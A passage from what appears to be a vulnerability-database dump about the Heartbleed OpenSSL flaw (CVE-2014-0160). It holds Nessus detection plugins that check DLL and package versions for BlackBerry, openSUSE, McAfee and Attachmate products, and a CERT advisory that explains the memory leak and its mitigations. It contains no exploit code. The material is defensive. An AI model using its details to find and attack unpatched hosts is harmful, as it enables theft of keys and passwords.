get_kb_item_or_exit(\"BlackBerry_ES/Version\");\npath = get_kb_item_or_exit(\"BlackBerry_ES/Path\");\n\napp_name = \"BlackBerry Enterprise Service\";\n\nif (\"BlackBerry Enterprise Service\" >!< product) audit(AUDIT_NOT_INST, app_name);\n\nif (version !~ \"^10\\.[12]\\.\") audit(AUDIT_NOT_INST, app_name+\" 10.x\");\n\n# Now, go check fileversion of tcnative-1.dll for UDS.\n# Note that, other tcnative-1.dll files may exist on\n# the server, this check is for the instance related\n# to UDS.\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nregistry_init();\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n}\n\ninfo = \"\";\ndll = \"\\RIM.BUDS.BWCN\\bin\\tcnative-1.dll\";\ntemp_path = path + dll;\ndll_ver = hotfix_get_fversion(path:temp_path);\nerr_res = hotfix_handle_error(\n error_code : dll_ver['error'],\n file : temp_path,\n appname : app_name,\n exit_on_fail : TRUE\n);\nhotfix_check_fversion_end();\n\ndll_version = join(dll_ver['value'], sep:\".\");\n\n# TC-Native begins using OpenSSL 1.0.1 branch (vuln) at version 1.1.24.0\n# TC-Native begins using OpenSSL 1.0.1g (patched) at version 1.1.30.0\nif (\n ver_compare(ver:dll_version, fix:'1.1.24.0', strict:FALSE) >= 0 &&\n ver_compare(ver:dll_version, fix:'1.1.30.0', strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + product +\n '\\n Path : ' + temp_path +\n '\\n Installed version : ' + dll_version +\n '\\n Fixed version : 1.1.30.0' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T00:27:18", "bulletinFamily": "scanner", "description": "This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).", "modified": "2020-01-02T00:00:00", "id": "OPENSUSE-2014-277.NASL", "href": "https://www.tenable.com/plugins/nessus/75314", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-277.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75314);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n\n script_name(english:\"openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)\");\n script_summary(english:\"Check for the openSUSE-2014-277 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl-devel-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debugsource-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl-devel-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debugsource-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopenssl-devel / libopenssl-devel-32bit / libopenssl1_0_0 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T00:18:34", "bulletinFamily": "scanner", "description": "The remote host is running a version of McAfee ePolicy Orchestrator\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.", "modified": "2020-01-02T00:00:00", "id": "MCAFEE_EPO_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73833", "published": "2014-05-02T00:00:00", "title": "McAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73833);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks version of ePolicy Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of McAfee ePolicy Orchestrator\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Hotfix 960279 per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:epolicy_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_epo_installed.nasl\");\n script_require_keys(\"SMB/mcafee_epo/Path\", \"SMB/mcafee_epo/ver\");\n script_require_ports(\"SMB/transport\", 139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\n\napp_name = \"McAfee ePolicy Orchestrator\";\nversion = get_kb_item_or_exit(\"SMB/mcafee_epo/ver\");\ninstall_path = get_kb_item_or_exit(\"SMB/mcafee_epo/Path\");\n\nhotfix = 'Hotfix 960279';\nhotfix_file = \"Apache2\\bin\\ssleay32.dll\";\nhotfix_fversion = \"1.0.1.7\";\nmin_affected = \"1.0.1\";\n\n# Versions 4.6, 5.0 and 5.1 are affected.\nif (version !~ \"^4\\.6\\.\" && version !~ \"^5\\.[01]\\.\") audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install_path);\n\n# Check the version of the affected DLL.\ndll_path = hotfix_append_path(path:install_path, value:hotfix_file);\ndll_version = hotfix_get_fversion(path:dll_path);\nhotfix_handle_error(error_code:dll_version['error'], file:dll_path, appname:app_name, exit_on_fail:TRUE);\nhotfix_check_fversion_end();\n\ndll_version = join(dll_version['value'], sep:'.');\n\nif (ver_compare(ver:dll_version, fix:min_affected, strict:FALSE) == -1) audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install_path);\n\nif (ver_compare(ver:dll_version, fix:hotfix_fversion, strict:FALSE) == -1)\n{\n port = kb_smb_transport();\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + install_path +\n '\\n Installed version : ' + version +\n '\\n OpenSSL DLL : ' + dll_path +\n '\\n DLL version : ' + dll_version +\n '\\n Fixed version : ' + hotfix_fversion +\n '\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T06:41:41", "bulletinFamily": "scanner", "description": "The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the ", "modified": "2020-01-02T00:00:00", "id": "ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/73965", "published": "2014-05-12T00:00:00", "title": "Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73965);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2288.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection for Secure IT Windows Client 7.2 SP3 Update 1\n(version 7.2.3.222) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection_for_secure_it_client\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection for Secure IT Windows Client';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\nforeach key (display_names)\n if (\"Attachmate Reflection for Secure IT Client\" >< key) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\"Attachmate Reflection for Secure IT Client\" >!< display_name) continue;\n key -= '/DisplayName';\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\n# If not in paranoid mode, and no version available\n# from the registry or version is not 7.0.x - 7.2.x,\n# then exit.\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n (\n isnull(display_version) ||\n display_version !~ \"^7\\.[012]($|[^0-9])\"\n )\n && report_paranoia < 2\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n\n if (isnull(display_version)) audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"7.0.x through 7.2.x\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nRegCloseKey(handle:hklm);\nif (isnull(install_location))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\npath = item[1];\n\nif (isnull(path))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\nclose_registry(close:FALSE);\n\nexe = path + \"openssl.dll\";\n\nver = hotfix_get_fversion(path:exe);\nerr_res = hotfix_handle_error(\n error_code : ver['error'],\n file : exe,\n appname : appname,\n exit_on_fail : TRUE\n);\nhotfix_check_fversion_end();\n\nversion = join(ver['value'], sep:\".\");\n\n# Vendor patch contains Openssl.dll version 14.1.411.0\nif (ver_compare(ver:version, fix:\"14.1.411.0\", strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n File : ' + exe +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.1.411.0' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cert": [{"lastseen": "2019-10-09T19:49:28", "bulletinFamily": "info", "description": "### Overview \n\nOpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as \"heartbleed.\"\n\n### Description \n\nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2 beta through 1.0.2-beta1 contain a flaw in its implementation of the TLS/DTLS heartbeat functionality ([RFC6520](<https://tools.ietf.org/html/rfc6520>)). This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL libssl library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to increase the chances that a leaked chunk contains the intended secrets. The sensitive information that may be retrieved using this vulnerability include:\n\n * Primary key material (secret keys)\n * Secondary key material (user names and passwords used by vulnerable services)\n * Protected content (sensitive data used by vulnerable services)\n * Collateral (memory addresses and content that can be leveraged to bypass exploit mitigations)\n \nPlease see the [Heartbleed](<http://heartbleed.com/>) website for more details. Exploit code for this vulnerability is publicly available. Any service that supports STARTTLS (imap,smtp,http,pop) may also be affected. \n--- \n \n### Impact \n\nBy attacking a service that uses a vulnerable version of OpenSSL, a remote, unauthenticated attacker may be able to retrieve sensitive information, such as secret keys. By leveraging this information, an attacker may be able to decrypt, spoof, or perform man-in-the-middle attacks on network traffic that would otherwise be protected by OpenSSL. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [OpenSSL 1.0.1g](<http://www.openssl.org/news/secadv_20140407.txt>). Please contact your software vendor to check for availability of updates. Any system that may have exposed this vulnerability should regenerate any sensitive information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items. Old keys should be revoked. \n \nReports indicate that the use of `mod_spdy` can prevent the updated OpenSSL library from being utilized, as mod_spdy uses its own copy of OpenSSL. Please see <https://code.google.com/p/mod-spdy/issues/detail?id=85> for more details. \n \n--- \n \n**Disable OpenSSL heartbeat support** \n \nThis issue can be addressed by recompiling OpenSSL with the `-DOPENSSL_NO_HEARTBEATS` flag. Software that uses OpenSSL, such as Apache or Nginx would need to be restarted for the changes to take effect. \n \n**Use Perfect Forward Secrecy (PFS)** \n \n[PFS](<http://en.wikipedia.org/wiki/Forward_secrecy>) can help minimize the damage in the case of a secret key leak by making it more difficult to decrypt already-captured network traffic. However, if a ticket key is leaked, then any sessions that use that ticket could be compromised. Ticket keys may only be regenerated when a web server is restarted. \n \n--- \n \n### Vendor Information\n\n720951\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Amazon\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/>\n\n### __ Arch Linux\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugs.archlinux.org/task/39775>\n\n### __ Aruba Networks, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.arubanetworks.com/support/alerts/aid-040814.asc>\n\n### __ __ Attachmate\n\nUpdated: April 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0160 OpenSSL 'Heartbleed' vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available. \n \nAttachmate maintains the following technical note about affected and \nnon-vulnerable versions: \n<http://support.attachmate.com/techdocs/2724.html> \n \nIn addition, Security Updates technical notes are also available for \nspecific \nproducts: \nSecurity Updates and Reflection for the Web or Reflection Security Gateway \n<http://support.attachmate.com/techdocs/1704.html> \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! \n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and INFOConnect \n<http://support.attachmate.com/techdocs/2546.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.attachmate.com/techdocs/2724.html>\n * <http://support.attachmate.com/techdocs/1704.html>\n * <http://support.attachmate.com/techdocs/1708.html>\n * <http://support.attachmate.com/techdocs/2288.html>\n * <http://support.attachmate.com/techdocs/2501.html>\n * <http://support.attachmate.com/techdocs/2502.html>\n * <http://support.attachmate.com/techdocs/2546.html>\n * <http://support.attachmate.com/techdocs/2700.html>\n\n### __ __ Bee Ware\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\ni-Suite versions 5.4.0 and above, up to version 5.5.4, are vulnerable. Versions 5.2.8 and 5.3.x are not vulnerable.\n\n### Vendor References\n\n * <http://documentation.bee-ware.net/display/SECU/CVE-2014-0160+-+OpenSSL+Heartblee\nd+Bug>\n\n### __ Blue Coat Systems\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.bluecoat.com/index?page=content&id=SA79](<http://kb.bluecoat.com/index?page=content&id=SA79>)\n\n### __ CA Technologies\n\nNotified: April 08, 2014 Updated: April 25, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={967F13F1-5720-4592-9BEB-42AD69EA14DC}>\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={7EBD736F-0227-4AEB-A7A9-9C5A4EA449C3}>\n\n### __ Cisco Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 10, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed>\n\n### __ Debian GNU/Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2014/dsa-2896>\n\n### __ __ 